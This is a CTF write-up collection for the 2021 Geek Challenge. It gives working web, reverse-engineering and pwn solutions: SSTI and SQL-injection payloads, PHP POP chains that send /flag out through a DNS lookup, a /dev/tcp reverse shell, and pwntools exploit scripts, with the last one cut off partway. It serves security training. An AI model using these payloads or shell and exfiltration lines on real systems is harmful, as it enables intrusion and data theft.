2021 Geek Challenge write-up (WP) collection

The write-ups come from the Network Security Community of Qilu Normal University

Follow the official account for more of the latest security news.

WEB

Dark

Looking at the URL, it ends in .onion, the standard dark-web (Tor hidden service) domain.

Open it with the Tor (onion) browser and view the HTML source.

Welcome2021

There is a hint at the start.

Change the request method from GET to WELCOME, then visit f11111aaaggg9.php

babypy

The simplest server-side template injection (SSTI):

{{config.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /flag').read()")}}

babyphp

View the page source.

Visit robots.txt.

Visit /noobcurl.php:

<?php
function ssrf_me($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);   // any scheme curl supports, no validation at all
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $output = curl_exec($ch);
    curl_close($ch);
    echo $output;
}
if(isset($_GET['url'])){
    ssrf_me($_GET['url']);
}
else{
    highlight_file(__FILE__);
    echo "<!-- Is there a possibility, flag In the root directory -->";
}

The comment hints that the flag is in the root directory; curl can read it directly with the file:// scheme:

noobcurl.php?url=file:///flag

babypop

The source code is:

<?php
class a {
    public static $Do_u_like_JiaRan = false;
    public static $Do_u_like_AFKL = false;
}
class b {
    private $i_want_2_listen_2_MaoZhongDu;
    public function __toString()
    {
        if (a::$Do_u_like_AFKL) {
            return exec($this->i_want_2_listen_2_MaoZhongDu);
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}
class c {
    public function __wakeup()
    {
        a::$Do_u_like_JiaRan = true;
    }
}
class d {
    public function __invoke()
    {
        a::$Do_u_like_AFKL = true;
        return "Pay attention to jiaran," . $this->value;
    }
}
class e {
    public function __destruct()
    {
        if (a::$Do_u_like_JiaRan) {
            ($this->afkl)();
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}
if (isset($_GET['data'])) {
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
}

Reading the code, the RCE ultimately happens through exec() in b::__toString.

Class d's __invoke returns a string concatenated with $this->value, so if value is a b object that concatenation triggers __toString.

If the condition in e::__destruct is true, ($this->afkl)() triggers __invoke on a d object.

Making that condition true is constrained by the static variables in class a:

class a {
  public static $Do_u_like_JiaRan = false;
  public static $Do_u_like_AFKL = false;
}

So the only way is c::__wakeup, which sets $Do_u_like_JiaRan to true.

From this the exploit follows:

<?php
// Chain: unserialize(c) -> c::__wakeup sets a::$Do_u_like_JiaRan = true
//   -> e::__destruct runs ($this->afkl)() -> d::__invoke sets a::$Do_u_like_AFKL = true
//   -> "..." . $this->value forces b::__toString -> exec($command)

class b {
    private $i_want_2_listen_2_MaoZhongDu;
    public function __construct(){
        // command handed to exec(); its output leaves as a DNS lookup to the ceye.io domain
        $this->i_want_2_listen_2_MaoZhongDu="curl `cat</flag|base64`.xxxx.ceye.io";
    }
}

class c {
    public $cvalue;                 // holds the e object so it is destructed after __wakeup ran
    public function __construct(){
        $this->cvalue=new e();
    }
}

class d {
    public $value;                  // the b object; the concatenation in __invoke triggers __toString
    public function __construct(){
        $this->value=new b();
    }
}

class e {
    public $afkl;                   // the d object; ($this->afkl)() calls __invoke
    public function __construct(){
        $this->afkl=new d();
    }
}

$a=new c();
echo base64_encode(serialize($a));

Pass the base64 output as the data parameter.

where_is_my_FUMO

Open the challenge and you see the source:

<?php
function chijou_kega_no_junnka($str) {
  $black_list = [">", ";", "|", "{", "}", "/", " "];
  return str_replace($black_list, "", $str);
}
if (isset($_GET['DATA'])) {
  $data = $_GET['DATA'];
  $addr = chijou_kega_no_junnka($data['ADDR']);
  $port = chijou_kega_no_junnka($data['PORT']);
  exec("bash -c \"bash -i < /dev/tcp/$addr/$port\"");
} else {
  highlight_file(__FILE__);
}

The parameters are passed as an array, and exec() spawns a reverse shell:

http://1.14.102.22:8115/?DATA[ADDR]=IP&DATA[PORT]=port

This bounces a shell to the given IP and port.

The VPS listens on that port:

nc -lvvp 9999

However, the reverse shell form used in the challenge only carries commands from the attacker to the victim: the commands execute, but nothing is echoed back.

bash -i < /dev/tcp/$addr/$port

There are two ways to get output from a shell without echo. The first is to bounce an interactive shell to another port on the VPS:

bash -i >& /dev/tcp/ip/6666 0>&1

Listen on that port, get the shell, and find flag.png in the root directory.

The user turns out to be www-data while the files on the host belong to root, so you can only read files and cannot write a webshell.

cat flag.png | base64

The output is long; base64-encode it, copy it out and decode it to get the picture.

The second method is simpler, but you need to understand how the bash reverse shell works.

/dev/tcp/ip/port (or /dev/udp/ip/port) is a special path. It can be thought of as a device (everything is a file under Linux), but it does not actually exist on the filesystem.

If someone is listening on that port, reading from or writing to this path gives socket communication with that listener.

So just send flag.png directly.

The VPS listens on port 6666 and saves what it receives:

nc -lvvp 6666 > /var/test.png

Finally you get the picture, which is the flag.

Honey snow ice city sweet honey

This challenge is close to a real penetration test.

Before starting, remember this is a web challenge; don't go looking for conventional password-guessing ideas.

Challenge hint: you get the flag by buying drink No. 9, but only 8 are listed. Capture the purchase request and change id=9; the resulting error, together with the source, shows what is going on.

The id is read from the HTML and then RSA-encrypted before being sent. Since the encryption is hard to tamper with, change the id directly in the page instead: pick any product, change its id to 9 in the F12 developer tools, then buy it.

easyPOP

<?php
class a {
    public function __destruct()
    {
        $this->test->test();
    }
}
abstract class b {
    private $b = 1;
    abstract protected function eval();
    public function test() {
        ($this->b)();
    }
}
class c extends b {
    private $call;
    protected $value;
    protected function eval() {
        if (is_array($this->value)) {
            ($this->call)($this->value);
        } else {
            die("you can't do this :(");
        }
    }
}
class d {
    public $value;
    public function eval($call) {
        $call($this->value);
    }
}
if (isset($_GET['data'])) {
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
}
Exploit:
<?php
class a {
    public function __construct()
    {
        $this->test=new c('cat /flag');
    }
}

abstract class b {
    private $b; # callable array [$this, 'eval'], set in the constructor

    public function __construct() {
        $this->b=[$this,'eval'];
    }

    abstract protected function eval();

    public function test() {
        ($this->b)();# called with no arguments: only a zero-argument callable (e.g. phpinfo) could run here directly, hence the hop through eval()
    }
}

class c extends b {
    private $call;
    protected $value;

    function __construct($command) {
        parent::__construct();
        $this->call=[new d('system'),'eval'];
        $this->value=[new d($command),'eval'];
    }
    protected function eval() {
        if (is_array($this->value)) {
            ($this->call)($this->value);
        } else {
            die("you can't do this :(");
        }
    }
}

class d {
    public $value;

    public function __construct($command){
        $this->value=$command;
    }
    public function eval($call) {
        $call($this->value);
    }
}

$payload = new a();
echo base64_encode(serialize($payload));
?>

babysql

The injection point closes with a single quote.

Testing shows the echoed positions are columns 1 and 2:

uname=1&pwd=1' union select 1,2,3,4 #

Dump the database names; one of them is the flag database:

uname=1&pwd=1' union select 1,group_concat(schema_name),3,4 from information_schema.schemata#

Dump the tables of the flag database:

uname=1&pwd=1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='flag'#

Dump the columns of the fllag table:

uname=1&pwd=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='fllag'#

Dump the data:

uname=1&pwd=1' union select 1,group_concat(fllllllag),3,4 from flag.fllag#
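As an added example (not from the write-up), the same UNION technique against a constructed four-column SQLite table, beside the parameterized query that defeats it; SQLite's `-- ` comment stands in for MySQL's `#` and sqlite_master for information_schema.

```python
import sqlite3

# Constructed sample table with four columns, matching the four-column UNION
# the write-up settles on ("union select 1,2,3,4").
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, uname TEXT, pwd TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                   [(1, "admin", "correct horse", "admin"), (2, "guest", "guest", "user")])
    return db

def login_vulnerable(db, uname: str, pwd: str):
    """String interpolation: a quote inside pwd closes the literal and the rest becomes SQL."""
    sql = f"SELECT id, uname, pwd, role FROM users WHERE uname='{uname}' AND pwd='{pwd}'"
    return db.execute(sql).fetchall()

def login_parameterized(db, uname: str, pwd: str):
    """Bound parameters: the driver passes values out of band, so quotes are just data."""
    sql = "SELECT id, uname, pwd, role FROM users WHERE uname=? AND pwd=?"
    return db.execute(sql, (uname, pwd)).fetchall()

# The write-up's payloads, adapted to SQLite: "-- " comment instead of MySQL's "#",
# sqlite_master instead of information_schema.tables.
UNION_PAYLOAD = "1' union select 1,2,3,4 -- "
ENUM_TABLES_PAYLOAD = "1' union select 1,group_concat(name),3,4 from sqlite_master -- "
DUMP_PAYLOAD = "1' union select 1,group_concat(pwd),3,4 from users -- "

def run_payload(payload: str):
    """Return (rows from the vulnerable query, rows from the parameterized query)
    for one injected pwd value; the parameterized query never matches."""
    db = make_db()
    return login_vulnerable(db, "1", payload), login_parameterized(db, "1", payload)
```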

Baby_PHP_Black_Magic_Enlightenment

First pass

<?php
echo "PHP is the best Language <br/>";
echo "Have you ever heard about PHP Black Magic<br/>";
error_reporting(0);
$temp = $_GET['password'];
is_numeric($temp)?die("no way"):NULL;
if($temp>9999){
  echo file_get_contents('./2.php');
  echo "How's that possible";
}
highlight_file(__FILE__);
//Art is long, but life is short. So I use PHP.
//I think It`s So useful that DiaoRen Said;
//why not they use their vps !!!
//BBTZ le jiarenmen
?>

Array bypass: pass password as an array. is_numeric() of an array is false, and an array compares greater than 9999 under PHP's loose comparison, so the contents of 2.php are echoed; read them in the page source.

Second pass

<?php
error_reporting(0);
$flag=getenv('flag');
if (isset($_GET['user']) and isset($_GET['pass'])) 
{
   if ($_GET['user'] == $_GET['pass'])
       echo 'no no no no way for you to do so.';
   else if (sha1($_GET['user']) === sha1($_GET['pass']))
     die('G1ve u the flag'.$flag);
   else
       echo 'not right';
}
else
   echo 'Just g1ve it a try.';
highlight_file(__FILE__);
?>

Array bypass again: sha1() called on an array returns NULL (PHP 7), so sha1(user) === sha1(pass) holds while the two arrays themselves differ for ==:

http://tc.rigelx.top:8003/baby_magic.php?user[1]=2&pass[1]=1

Third pass

<?php
error_reporting(0);
$flag=getenv('fllag');
if (isset($_GET['user']) and isset($_GET['pass'])) 
{
    if ($_GET['user'] == $_GET['pass'])
        echo 'no no no no way for you to do so.';
    else if(is_array($_GET['user']) || is_array($_GET['pass']))
        die('There is no way you can sneak me, young man!');
    else if (sha1($_GET['user']) === sha1($_GET['pass'])){
      echo "Hanzo:It is impossible only the tribe of Shimada can controle the dragon<br/>";
      die('Genji:We will see again Hanzo'.$flag.'<br/>');
    }
    else
        echo 'Wrong!';
}else
    echo 'Just G1ve it a try.';
highlight_file(__FILE__);
?>

Arrays are now rejected, so a real SHA-1 collision is needed: the well-known colliding PDF pair (the "SHA-1 is dead" prefixes), URL-encoded, has the same SHA-1 while the two strings differ for ==:

http://tc.rigelx.top:8003/baby_revenge.php?user=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&

&pass=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

The fourth level

<?php
$flag=getenv('flllllllllag');
if(strstr("Longlone",$_GET['id'])) {
  echo("no no no!<br>");
  exit();
}
$_GET['id'] = urldecode($_GET['id']);
if($_GET['id'] === "Longlone")
{
  
  echo "flag: $flag";
}
highlight_file(__FILE__);
?>

Very simple: strstr() runs on the value before urldecode(), so the check sees the still-encoded string. URL-encode the id twice (PHP decodes once when building $_GET, and the script decodes once more) and the filter is bypassed:

http://tc.rigelx.top:8003/here_s_the_flag.php?id=%25%34%63%25%36%66%25%36%65%25%36%37%25%36%63%25%36%66%25%36%65%25%36%35
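As an added example (not from the write-up), the check-then-decode order of the fourth level in Python, exercised with the double-encoded id above, beside the decode-then-check order that closes the bypass.

```python
from urllib.parse import unquote

SECRET_NAME = "Longlone"

def php_get(raw_query_value: str) -> str:
    """PHP already URL-decodes a query-string value once when it fills $_GET."""
    return unquote(raw_query_value)

def check_vulnerable(raw_query_value: str) -> bool:
    """Mirrors the challenge: blocklist check on the once-decoded value, then a
    second urldecode() before the comparison. True means the flag would be printed."""
    value = php_get(raw_query_value)
    # strstr("Longlone", $_GET['id']): note the argument order, the user value is the needle
    if value in SECRET_NAME:
        return False                     # "no no no!"
    value = unquote(value)               # decoded again *after* the check
    return value == SECRET_NAME

def check_fixed(raw_query_value: str) -> bool:
    """Canonicalise first (every decode step the code will ever apply), then run
    every check on that one value. The blocklist now sees exactly what is compared,
    so the double-encoded form no longer slips past it."""
    value = unquote(php_get(raw_query_value))
    if value in SECRET_NAME:
        return False
    return value == SECRET_NAME

# The write-up's double-encoded id, as it appears in the request line.
DOUBLE_ENCODED = "%25%34%63%25%36%66%25%36%65%25%36%37%25%36%63%25%36%66%25%36%65%25%36%35"
```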

People artists

The challenge is a bit unbalanced.

First there is a login page. If the login fails, the account name is prompted.

Log in with this account and capture the traffic; the response contains a JWT.

Inspect it with jwt.io. It is signed with a secret; brute-force it with jwtrack: the password is 1234. Combined with the hint, change the name to admin and the time to 2019.

At first I thought there was another endpoint, and I sent the JWT along with the requests, but dirsearch found nothing, so I tried the HTTP request line instead.

Ha, and that worked.

givemeyourlove

The hint is obvious: SSRF to Redis.

<?php
// I hear her lucky number is 123123
highlight_file(__FILE__);
$ch = curl_init();
$url=$_GET['url'];
if(preg_match("/^https|dict|file:/is",$url))
{
    echo 'NO NO HACKING!!';
    die();
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);   
curl_close($ch);  
?>

Use the http scheme to check whether the service is up:

http://1.14.71.112:44423/?url=http://127.0.0.1:6379

Redis takes a long time to respond, but I couldn't get through.
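As an added example (not the challenge's code), the blocklist regex above transcribed into Python to show why the http probe URL passes it, beside the allow-list validator such an endpoint should use instead; the DNS table is a constructed stub so the code runs offline.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# The challenge's blocklist, transcribed from preg_match("/^https|dict|file:/is", $url).
# Alternation binds looser than the ^ anchor, so only "https" must be at the start;
# "dict" and "file:" are rejected anywhere, and plain "http://..." is never rejected at all.
CHALLENGE_FILTER = re.compile(r"^https|dict|file:", re.IGNORECASE | re.DOTALL)

def challenge_filter_blocks(url: str) -> bool:
    """True if the original PHP filter would have answered 'NO NO HACKING!!'."""
    return CHALLENGE_FILTER.search(url) is not None

# Allow-list instead of block-list: scheme and port are pinned, and the target
# host is resolved and checked against non-public address ranges.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Constructed stand-in for DNS so the example runs offline. A real deployment would
# call socket.getaddrinfo() and then connect to the *checked* address rather than
# re-resolving the name at fetch time (DNS rebinding).
STUB_DNS = {
    "example.com": ["93.184.216.34"],
    "intranet.local": ["10.0.0.5"],
}

def stub_resolve(host: str) -> list:
    return STUB_DNS.get(host.lower(), [])

def is_public_address(ip) -> bool:
    """Reject loopback, RFC 1918, link-local (cloud metadata), multicast, reserved, unspecified."""
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def hardened_filter_allows(url: str, resolve=stub_resolve) -> bool:
    """Allow-list validation for a user-supplied fetch URL. Fails closed on any parse error."""
    try:
        parts = urlsplit(url)
        host = parts.hostname          # userinfo and brackets already stripped
        port = parts.port              # ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme not in ALLOWED_SCHEMES or not host:
        return False
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False
    # An IP literal is checked directly; a name is resolved and *every* answer must be
    # public, because an attacker-controlled name can mix public and private records.
    # Decimal or octal IP spellings are not literals here and fall through to DNS.
    try:
        addresses = [ipaddress.ip_address(host)]
    except ValueError:
        addresses = [ipaddress.ip_address(a) for a in resolve(host)]
    if not addresses:
        return False
    return all(is_public_address(ip) for ip in addresses)
```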

RE

Re0

Load it into IDA, press F5 and search for the string to see the flag directly:

SYC{Welcome_to_Geek_challenge2021}

debugging

Load it into IDA and find the main function; the encrypted string is obvious:

797G91WhVFeM465FoGJuWpHKDro2QyCixboJV7uhVAV2pfxkhtiTo3CHd7a

Run it through a cipher identifier: it is clearly a Base-family encoding, and testing shows it is Base58:

SYC{C0ngr@tuIatlOns_thls_1s_th3_r!gHt_f!ag}

easypyc

easypy.pyc

Decompile it to a .py file with uncompyle6 and read the source:

def Challenge():
    import sys
    print("Welcome to py's world")
    S = input('plz give me your flag:')
    Key = input('plz give me your key(string):')
    if len(S) != 51 or len(Key) != 8:
        print("the flag's or key's strlen...")
        sys.exit()
    else:
        tmp = S[4:50]
        KEY_cmp = 'Syclover'
        key = []
        key_cmp = ''
        for i in Key:
            key.append(ord(i))
        try:
            key_cmp += chr((key[1] * key[2] - key[5] * 72 - key[4] * 3 - key[3] ^ key[1] + (key[3] << 2) + key[2] * 6 - key[7] & key[6] - 1000) - 14)
            key_cmp += chr((key[5] * 7 + key[3] * 3 + key[2] + key[6] - (key[2] >> 2) - key[1] ^ key[0] + key[7] + (key[4] ^ key[1]) + (key[4] | key[7])) - 801)
            key_cmp += chr((key[6] * 5 + key[2] * 6 - key[3] * 7 + key[4] | key[5] + key[4] * 10 + key[0] ^ key[1] * 3 - key[7] + key[0] + key[1]) - 924)
            key_cmp += chr(key[1] * 3 + key[5] * 9 + key[0] + key[2] * 2 + key[3] * 5 - key[4] * (key[6] ^ key[7]) + 321 - 16)
            key_cmp += chr((key[5] * 12 - key[0] ^ key[6] - key[3] * 23 + key[4] * 3 + key[2] * 8 + key[1] - key[7] * 2 + key[6] * 4 + 1324) + 1)
            key_cmp += chr(key[3] * 54 - key[1] * 3 + key[2] * 3 + key[4] * 11 - key[5] * 2 + key[0] + key[7] * 3 - key[6] - 6298 + 40)
            key_cmp += chr(key[7] - key[6] * key[3] + key[2] * key[2] - key[4] * 32 + key[5] * (key[0] >> 2) - key[1] * key[1] - 6689 + 41)
            key_cmp += chr((key[5] - key[3] * 41 + key[6] * 41 + key[5] ^ (key[4] & key[6] | key[0]) - (key[7] * 24 | key[2]) + key[1] - 589) - 36)
            print(key_cmp)
        except ValueError:
            print("You know what I'm going to say...")
            sys.exit()

        if key_cmp != KEY_cmp:
            print("You know what I'm going to say...")
            sys.exit()
        flag = [
         113, 74, 71, 35, 29, 91, 29, 12, 114, 73, 60, 52, 69, 5, 113, 35, 95, 38, 20, 112, 95, 7, 74, 12, 102, 23, 7, 31, 87, 5, 113, 98, 85, 38, 16, 112, 29, 6, 30, 12, 65, 73, 83, 36, 12, 23]
        for i in range(46):
            if ord(tmp[i]) ^ key[((i + 1) % len(key))] != flag[i]:
                print("You know what I'm going to say...")
                sys.exit()

        print('Yeah!Submit your flag in a hurry~')

Challenge()

The code XORs the slice S[4:50] of the flag we enter with the key and requires the result to equal the flag array.

So we need to recover tmp from the key and the flag array. We don't know the key, but key_cmp is computed from it and compared with 'Syclover'; with that many constraints, z3 can solve for the key.

from z3 import *
s = Solver() 
v0 = BitVec('v0',32)
v1 = BitVec('v1',32)
v2 = BitVec('v2',32)
v3 = BitVec('v3',32)
v4 = BitVec('v4',32)
v5 = BitVec('v5',32)
v6 = BitVec('v6',32)
v7 = BitVec('v7',32)
s.add(((v1*v2-v5*72-v4*3-v3^v1+(v3<<2)+v2*6-v7&v6-1000)-14) == 83)
s.add(((v5*7+v3*3+v2+v6-(v2>>2)-v1^v0+v7+(v4^v1)+(v4|v7))-801) == 121)
s.add(((v6*5+v2*6-v3*7+v4|v5+v4*10+v0^v1*3-v7+v0+v1)-924) == 99)
s.add((v1*3+v5*9+v0+v2*2+v3*5-v4*(v6^v7)+321-16) == 108)
s.add(((v5*12-v0^v6-v3*23+v4*3+v2*8+v1-v7*2+v6*4+1324)+1) == 111)
s.add((v3*54-v1*3+v2*3+v4*11-v5*2+v0+v7*3-v6-6298+40)  == 118)
s.add((v7-v6*v3+v2*v2-v4*32+v5*(v0>>2)-v1*v1-6689+41) == 101)
s.add(((v5-v3*41+v6*41+v5^(v4&v6|v0)-(v7*24|v2)+v1-589)-36) == 114)
print(s.check())
if(s.check() == sat):
    result = s.model()
    print(result)

This gives key = [83,38,121,99,64,45,54,46].

Recover the flag with a script:
key = [83,38,121,99,64,45,54,46]
flag = [
    113, 74, 71, 35, 29, 91, 29, 12, 114, 73, 60, 52, 69, 5, 113, 35, 95, 38, 20, 112, 95, 7, 74, 12, 102, 23, 7, 31,
    87, 5, 113, 98, 85, 38, 16, 112, 29, 6, 30, 12, 65, 73, 83, 36, 12, 23]
tmp = ''
for i in range(46):
    tmp+= chr((key[((i + 1) % len(key))]) ^ flag[i])
print(tmp)

SYC{W3$c0m3_T0_th3_py_w0r1d_@nd_z3_1s_s0000_g00d!!}

Liu Zhuang desktop beautification master

Open it with Android Killer.

Navigate to the key string.

From there it is clear the flag is stored in a file as a plain string.

PWN

Retxxx

A simple stack overflow:

from pwn import *
import time
context.arch = 'amd64'
context.log_level = 'debug'

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('123.57.230.48','12345')
# gdb.attach(p,'b *0x08048625')
sa('Try your best to solve it!',p32(0x6b8b4567))
system = 0x80483c0
sh = 0x80496d0
pl = 'a'*30+p32(system)+p32(0)+p32(sh)
s(pl)
shell()

easycanary

Leak canary and call

from pwn import *
context.log_level = 'debug'

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('123.57.230.48','12344')
backdoor=0x4011d6
# gdb.attach(p,'b *0x4012A3')
sl('%11$p')
canary = int(rx(18),16)
success(hex(canary))
pl = 'a'*0x28+p64(canary)+p64(0)+p64(backdoor)
s(pl)
shell()

easyfmt

Simple format string question

from pwn import *
# context.log_level = 'debug'

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('123.57.230.48','12342')
elf = ELF('./pwn')
backdoor = 0x0804874d
# gdb.attach(p,'b *0x08048685')
ru('First step:\n')
target = int(rud('\n'),16)
pl = p32(target)+'%8c%15$n'
success(hex(target))
sl(pl)

pl = p32(target+0x10)+'%'+str((backdoor&0xff)-4)+'c%7$hhn'
sla('there',pl)
shell()

Love games

from pwn import *

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('47.242.20.238','10001')
pl = 'a'*24+p64(0x404058)
s(pl)
shell()

Love games 2.0

from pwn import *

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('47.242.20.238','10000')
pl = 'a'*24+'loveyou\x00'
s(pl)
shell()

checkin

from pwn import *

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

p = remote('123.57.230.48','12343')
for i in range(200):
	ru('num1:')
	num1 = rud('\n')
	ru('num2:')
	num2 = rud('\n')
	ru('calculation is ')
	sign = rud('\n')
	print(num1,num2,sign)
	result = eval(num1+sign+num2)
	sl(str(result))
shell()

pwn777

The format string lives on the bss segment and a sandbox is enabled. First overwrite the seed with 0 to pass the first check, then use the format-string vulnerability to build a springboard: rewrite the saved rbp to point at the ORW (open/read/write) chain and migrate the stack there. The script could be made 100% reliable, but out of laziness it stays a probabilistic solution.

from pwn import *
import time
context.arch = 'amd64'
context.log_level = 'debug'

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

def pwn():
	sla('input your name','a'*0x18+p32(0))
	sla('input your number:',str(0x6b8b4567))
	sla('input your number:',str(0x327b23c6))
	sla('input your number:',str(0x643c9869))
	sla('input your number:',str(0x66334873))
	sla('input your number:',str(0x74b0dc51))
	sla('input your number:',str(0x19495cff))
	sla('input your number:',str(0x2ae8944a))
	sla('input your number:',str(0x625558ec))
	sla('input your number:',str(0x238e1f29))
	sla('input your number:',str(0x46e87ccd))
	sla('try your best!\n','Amalll')
	sleep(0.1)
	sl('%31$p')
	ru('Amalll')
	base = int(rx(14),16)-0x5fa80b
	system = base+libc.sym['system']&0xffffff
	sh = base+libc.search('/bin/sh\x00').next()
	rdi = base+libc.search(asm("pop rdi;ret;")).next()
	ret = base+libc.search(asm("ret;")).next()

	sl('Amalll')
	sleep(0.1)
	sl('%7$p')
	ru('Amalll')
	pie = int(rx(14),16)-71-elf.sym['mymain']
	buf = (pie+0x4060)+8
	success(hex(buf))

	pl = '%'+str(buf&0xff)+'c%7$hhn'

	sl('Amalll')
	sleep(0.1)
	sl('%10$p')
	rx(6)
	stack = int(rx(14),16)-0x30
	success(hex(stack))

	#15-->41
	sl('Amalll')
	sleep(0.1)
	pl = '%'+str(stack&0xffff)+'c%15$hn'
	sl(pl)

	#29-->43
	sl('Amalll')
	sleep(0.1)
	pl = '%'+str((stack&0xffff)+2)+'c%29$hn'
	sl(pl)

	#41-->6
	sl('Amalll')
	sleep(0.1)
	pl = '%'+str((stack&0xffff)+4)+'c%41$hn'
	sl(pl)

	x = []
	x.append(buf&0xffff)
	x.append((buf>>16)&0xffff)
	x.append((buf>>32)&0xffff)
	x.sort()
	print(x[0],x[1],x[2]) #high,low,mid

	# gdb.attach(p,'b *$rebase(0x1621)')
	pl = '%'+str(x[0])+'c%6$hn' #high
	pl+= '%'+str(x[1]-x[0])+'c%41$hn'
	pl+= '%'+str(x[2]-x[1])+'c%43$hn'
	sl('Amalll')
	sleep(0.1)
	sl(pl)


	rdi = base+libc.search(asm("pop rdi;ret;")).next()
	rsi = base+libc.search(asm("pop rsi;ret;")).next()
	rdx = base+libc.search(asm("pop rdx;ret;")).next()
	f_hook = base+libc.sym['__free_hook']
	dopen = base+libc.sym['open']
	dread = base+libc.sym['read']
	dwrite = base+libc.sym['write']

	rop = p64(rdi)+p64(buf+0xa0)
	rop+= p64(rsi)+p64(0)+p64(dopen)
	rop+= p64(rdi)+p64(3)
